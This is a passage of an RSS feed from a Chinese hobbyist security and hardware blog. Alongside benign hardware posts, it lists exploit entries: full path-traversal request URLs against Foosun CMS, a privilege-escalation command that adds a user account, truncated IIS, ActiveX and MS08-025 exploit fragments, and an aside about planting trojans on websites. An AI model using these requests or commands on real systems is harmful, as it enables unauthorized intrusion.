target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>OsmocomBB项目</title><link>http://www.blogjava.net/baicker/archive/2013/11/13/406293.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 13 Nov 2013 08:27:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2013/11/13/406293.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/406293.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2013/11/13/406293.html#Feedback</comments><slash:comments>114</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/406293.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/406293.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>之前看过好多大牛玩osmocomBB项目，改个手机，连电脑，然后编译一堆东西，到最后都是开个console，满屏红红绿绿的文字滚动，看着很吊。<br>但都不说最终能干啥，滚屏完了就没了，大牛都太低调了，最近有朋友也在搞这个，了解了一下，以下描述都是我最近查阅的大量鸟文资料及少量中文资料之后的理解，如有误望指出。<br>    OsmocomBB是国外一个开源项目，是GSM协议栈(Protocols stack)的开源实现，全称是Open source mobile communication Baseband.目的是要实现手机端从物理层(layer1)到layer3的三层实现。<br>    这里记录一下过程，以便备忘和其它有需要的童鞋少走弯路。<br>........ <br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2013/11/13/406293.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/406293.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2013-11-13 16:27 <a href="http://www.blogjava.net/baicker/archive/2013/11/13/406293.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Raspberry Pi 增加TFT显示</title><link>http://www.blogjava.net/baicker/archive/2012/12/18/392829.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 18 Dec 2012 07:21:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2012/12/18/392829.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/392829.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2012/12/18/392829.html#Feedback</comments><slash:comments>8</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/392829.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/392829.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>    Raspberry Pi是一款基于Linux系统的个人电脑，配备一枚700MHz的处理器，256内存，支持SD卡和Ethernet，拥有两个USB接口，以及 HDMI和RCA输出支持。<br>    有消息称，虽然Raspberry Pi看起来非常的迷你——只有一张信用卡大小，但是它能够运行像《雷神之锤三：竞技场》这样的游戏和进行1080p视频的播放。但是以这次接TFT屏试用结果看，我觉得至少SPI是纯属扯J8蛋，可能HDMI速度快点，但是就以那编译内核的速度来看，并不乐观。<br><img src="/images/blogjava_net/baicker/RPI_TFT/IMG_20121217_191227.jpg" height="300"><br>... ...<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2012/12/18/392829.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/392829.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2012-12-18 15:21 <a href="http://www.blogjava.net/baicker/archive/2012/12/18/392829.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>TVB-Gone 红外编码方法（每次都重新推算一遍，年纪大了还是记录一下吧）</title><link>http://www.blogjava.net/baicker/archive/2012/10/23/390119.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 23 Oct 2012 09:38:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2012/10/23/390119.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/390119.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2012/10/23/390119.html#Feedback</comments><slash:comments>5</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/390119.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/390119.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>每次都重新推算一遍，年纪大了还是记录一下吧（<a href="http://www.blogjava.net/baicker/archive/2011/07/30/355418.html">硬件版的TV-B-Gone</a>的压缩编码跳过此段往下看）<br><br>N900上有个TVB-Gone的程序，但是程序的红外编码往往都是对应的国外的电视，好多国产电视都不支持，<br>有时候需要遥控空调或者投影之类的，只能自己录入了，大概看了一下，编码比较简单（比硬件那个简单多了，毕竟不需要考虑程序空间的问题）<br>（上次录过一次，这次又重搞一遍，还是记录一下，以备后用。）<br>。。。<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2012/10/23/390119.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/390119.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2012-10-23 17:38 <a href="http://www.blogjava.net/baicker/archive/2012/10/23/390119.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Raspberry Pi 入手安装配置 （有图有真相）</title><link>http://www.blogjava.net/baicker/archive/2012/08/10/385239.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 10 Aug 2012 08:21:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2012/08/10/385239.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/385239.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2012/08/10/385239.html#Feedback</comments><slash:comments>5</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/385239.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/385239.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>托rock的福，跟风败了个Raspberry Pi，（破手机照的，还可以吧 ^_^），安装配置如下：<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2012/08/10/385239.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/385239.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2012-08-10 16:21 <a href="http://www.blogjava.net/baicker/archive/2012/08/10/385239.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>无线键盘监听（更新 LCD 1602）</title><link>http://www.blogjava.net/baicker/archive/2011/02/19/344640.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 18 Feb 2011 18:40:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2011/02/19/344640.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/344640.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2011/02/19/344640.html#Feedback</comments><slash:comments>15</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/344640.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/344640.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>    一个国外的开源项目，通过截获无线键盘发出的信号，来监听键盘按键操作，第一个版本支持监听27MHz的无线键盘，第二个版本支持2.4G的无线键盘监听及注入功能，爽。<br><br>    以前玩过C51单片机，加上本身自学能力和手工焊接功底不错，磕磕绊绊几个月下来，终于初步完成了这个小玩意。<br><br>    这次的芯片是ATMEL的MEGA64A，比之前C51系列的又强大、复杂了不少，制作过程中遇到非常多的问题，在这里鄙视一下（强烈地）国内的知识共享精神<br><br>…………<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2011/02/19/344640.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/344640.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2011-02-19 02:40 <a href="http://www.blogjava.net/baicker/archive/2011/02/19/344640.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>遭受 MSN D.o.S</title><link>http://www.blogjava.net/baicker/archive/2010/06/14/323582.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Mon, 14 Jun 2010 14:45:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2010/06/14/323582.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/323582.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2010/06/14/323582.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/323582.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/323582.html</trackback:ping><description><![CDATA[<a id="ViewPicture1_OriginalImage" href="http://009.see2.org/images/msn_d.o.s.jpg" rel="lightbox[roadtrip]" title="点击右下角或按ESC关闭&lt;BR&gt;或者点击图片浏览相邻一张图片"><img id="ViewPicture1_GalleryImage" src="http://009.see2.org/images/msn_d.o.s.jpg" style="border-color: Black; border-width: 0px; height: 300px;" alt="" /> </a><br />
<img src ="http://www.blogjava.net/baicker/aggbug/323582.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2010-06-14 22:45 <a href="http://www.blogjava.net/baicker/archive/2010/06/14/323582.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>风讯所有版本多个目录相关漏洞</title><link>http://www.blogjava.net/baicker/archive/2009/11/11/302036.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 11 Nov 2009 15:43:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2009/11/11/302036.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/302036.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2009/11/11/302036.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/302036.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/302036.html</trackback:ping><description><![CDATA[目录更名（新目录不能包含点）<br />
/User/FileManage.asp?Type=FolderReName&amp;OldFileName=../../FS_Inc&amp;NewFileName=009<br />
<br />
目录浏览（CurrPath不能包含点）<br />
/Foosun500/User/CommPages/FolderImageList.asp?CurrPath=/userfiles/&amp;ShowVirtualPath=&amp;f_UserNumber=1210538AD00<br />
<img alt="" src="http://www.blogjava.net/images/blogjava_net/baicker/FooSun500.jpg" /><br />
<br />
创建目录xxxx（CurrPath不能包含点）<br />
/User/CommPages/FolderImageList.asp?CurrPath=/userfiles/xxxx&amp;ShowVirtualPath=&amp;f_UserNumber=1210538AD00
<img src ="http://www.blogjava.net/baicker/aggbug/302036.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2009-11-11 23:43 <a href="http://www.blogjava.net/baicker/archive/2009/11/11/302036.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版</title><link>http://www.blogjava.net/baicker/archive/2009/09/20/295752.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sun, 20 Sep 2009 07:09:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2009/09/20/295752.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/295752.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2009/09/20/295752.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/295752.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/295752.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>绑定4444端口，Windows 2000 CN + SP4 测试通过，需要能建目录的用户，偏移地址若不通用，请自行修改。<br>#!/usr/bin/perl<br># IIS 5.0 FTP Server / Remote SYSTEM exploit<br>..................<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2009/09/20/295752.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/295752.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2009-09-20 15:09 <a href="http://www.blogjava.net/baicker/archive/2009/09/20/295752.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>TRS （文本检索系统）注入</title><link>http://www.blogjava.net/baicker/archive/2009/09/10/294589.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 10 Sep 2009 07:12:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2009/09/10/294589.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/294589.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2009/09/10/294589.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/294589.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/294589.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>TRS 是英文Text Retrieval System（文本检索系统）的缩写，据说是全文检索、搜索引擎、内容管理及知识管理核心技术和产品的统一，入选2008年度国家规划布局内重点软件企业，做某些渗透经常会碰到。<br>......<br><br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2009/09/10/294589.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/294589.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2009-09-10 15:12 <a href="http://www.blogjava.net/baicker/archive/2009/09/10/294589.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload </title><link>http://www.blogjava.net/baicker/archive/2009/07/27/288547.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Mon, 27 Jul 2009 03:54:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2009/07/27/288547.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/288547.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2009/07/27/288547.html#Feedback</comments><slash:comments>4</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/288547.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/288547.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>鸟文没太看明白，摸索了一下，$_FILE数组元素解析的问题。<br>搭个php的环境，目录在C:\www下，根目录下有个upload.php代码如下<br>......<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2009/07/27/288547.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/288547.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2009-07-27 11:54 <a href="http://www.blogjava.net/baicker/archive/2009/07/27/288547.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客控制整栋大厦电力系统,改编成游戏!</title><link>http://www.blogjava.net/baicker/archive/2009/02/06/253651.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 06 Feb 2009 15:57:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2009/02/06/253651.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/253651.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2009/02/06/253651.html#Feedback</comments><slash:comments>6</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/253651.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/253651.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>这才是牛逼黑客,控制整栋大厦电力系统,大厦灯光来做背景,改编成游戏!坦克大战~~<br>.............<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2009/02/06/253651.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/253651.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2009-02-06 23:57 <a href="http://www.blogjava.net/baicker/archive/2009/02/06/253651.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>以色列人发现的IE 0day (ZT)</title><link>http://www.blogjava.net/baicker/archive/2009/01/08/250528.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 08 Jan 2009 11:16:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2009/01/08/250528.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/250528.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2009/01/08/250528.html#Feedback</comments><slash:comments>8</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/250528.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/250528.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>测试成功，点打印后，会弹出计算器<br>.........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2009/01/08/250528.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/250528.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2009-01-08 19:16 <a href="http://www.blogjava.net/baicker/archive/2009/01/08/250528.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)</title><link>http://www.blogjava.net/baicker/archive/2008/10/09/233300.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 09 Oct 2008 02:52:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/10/09/233300.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/233300.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/10/09/233300.html#Feedback</comments><slash:comments>13</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/233300.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/233300.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>我的有啥补丁打啥补丁的Win2k3 CN SP1测试成功<br><br>d:\Churrasco.exe "net user 009 /add"<br><br>/churrasco/-->Current User: NETWORK SERVICE<br>/churrasco/-->Getting Rpcss PID ...<br>/churrasco/-->Found Rpcss PID: 1948<br>/churrasco/-->Searching for Rpcss threads ...<br>/churrasco/-->Found Thread: 472 <br>.......<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/10/09/233300.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/233300.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-10-09 10:52 <a href="http://www.blogjava.net/baicker/archive/2008/10/09/233300.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>WordPress暴绝对路径</title><link>http://www.blogjava.net/baicker/archive/2008/08/12/221492.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 12 Aug 2008 06:46:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/08/12/221492.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/221492.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/08/12/221492.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/221492.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/221492.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>(之前发的"关于Fs2You怎么才能不被和谐"的文章被和谐掉了)<br>装WordPress顺便看到的<br>默认plugins目录有hello.php文件，不过好像很多插........<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/08/12/221492.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/221492.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-08-12 14:46 <a href="http://www.blogjava.net/baicker/archive/2008/08/12/221492.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title> Microsoft Office Snapshot Viewer ActiveX Exploit (可执行版)</title><link>http://www.blogjava.net/baicker/archive/2008/07/14/214835.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Mon, 14 Jul 2008 15:07:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/07/14/214835.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/214835.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/07/14/214835.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/214835.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/214835.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>lcx给的，网上的都是放启动项，这个可以自动执行<br><br>&lt;script type="text/javascript"&gt;<br>function killErrors() {<br>return true;<br>}<br>window.onerror = killErrors;<br><br>var x;<br>var obj;<br>.........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/07/14/214835.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/214835.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-07-14 23:07 <a href="http://www.blogjava.net/baicker/archive/2008/07/14/214835.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>flash 9,0,115,0 exp (ZT)</title><link>http://www.blogjava.net/baicker/archive/2008/05/30/204049.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 30 May 2008 03:26:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/05/30/204049.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/204049.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/05/30/204049.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/204049.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/204049.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 未测试，觉得比较鸡肋，能中的人实在太少了<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/05/30/204049.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/204049.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-05-30 11:26 <a href="http://www.blogjava.net/baicker/archive/2008/05/30/204049.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>MS08-025 for win2k &amp; win2k3</title><link>http://www.blogjava.net/baicker/archive/2008/04/17/193889.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Thu, 17 Apr 2008 15:43:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/04/17/193889.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/193889.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/04/17/193889.html#Feedback</comments><slash:comments>7</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/193889.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/193889.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: Win2k CN SP2 ，Win2k3 CN SP1下测试通过，其它未测试(不装XP那种垃圾)<br>D:\>ms08025 whoami<br><br>        MS08-025 Windows Local Privilege Escalation Vulnerability Exploit<br>        By 009, baicker@hotmail.com<br>        TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1<br><br>Kernel is \WINNT\System32\ntoskrnl.exe<br>Get KernelBase Success, ntoskrnl.exe base = 80400000<br>Mapping ntoskrnl.exe ... ok<br>KeServiceDescriptorTable = 008ED280<br>Find KiServiceTable ... Get ZwVdmControl Number ... ok!<br>ZwVdmCo&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/04/17/193889.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/193889.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-04-17 23:43 <a href="http://www.blogjava.net/baicker/archive/2008/04/17/193889.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Firefox自定义referer插件（Firefox突破防盗链）</title><link>http://www.blogjava.net/baicker/archive/2008/04/08/191485.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 08 Apr 2008 06:42:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/04/08/191485.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/191485.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/04/08/191485.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/191485.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/191485.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>RefControl 0.8.10<br><br>要是上次找到这个插件就好了，省得我一遍一遍地用nc修改referer提交<br>很多防盗链和防本地提交是依靠用户浏览器自动提交.......<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/04/08/191485.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/191485.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-04-08 14:42 <a href="http://www.blogjava.net/baicker/archive/2008/04/08/191485.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Firefox突破图片防盗链</title><link>http://www.blogjava.net/baicker/archive/2008/04/08/191474.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 08 Apr 2008 06:00:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/04/08/191474.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/191474.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/04/08/191474.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/191474.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/191474.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: 以下方法修改完后，再刷新本页就能看到上面图片<br>Firefox：输入about:config进入配置页面，修改network.http.sendRefererHeader的值为1即可（默认是2），<br>.....<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/04/08/191474.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/191474.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-04-08 14:00 <a href="http://www.blogjava.net/baicker/archive/2008/04/08/191474.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Real Player rmoc3260.dll Exp (老C给的，据说好用)</title><link>http://www.blogjava.net/baicker/archive/2008/04/02/190490.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 02 Apr 2008 15:56:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2008/04/02/190490.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/190490.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2008/04/02/190490.html#Feedback</comments><slash:comments>5</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/190490.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/190490.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>milw0rm上的，生成器<br>lcx给的，稍微改了改代码，据说好用<br>未测试，最近忙到自杀的时间都没有<br>唉，可惜有马时候没洞，有洞时候没马，要不就找个站挂上了。<br><br>http://www.blogjava.net/Files/baicker/Real........<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2008/04/02/190490.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/190490.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2008-04-02 23:56 <a href="http://www.blogjava.net/baicker/archive/2008/04/02/190490.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>简单认识Anti-RootKit(ZT)</title><link>http://www.blogjava.net/baicker/archive/2007/12/29/171547.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sat, 29 Dec 2007 07:09:00 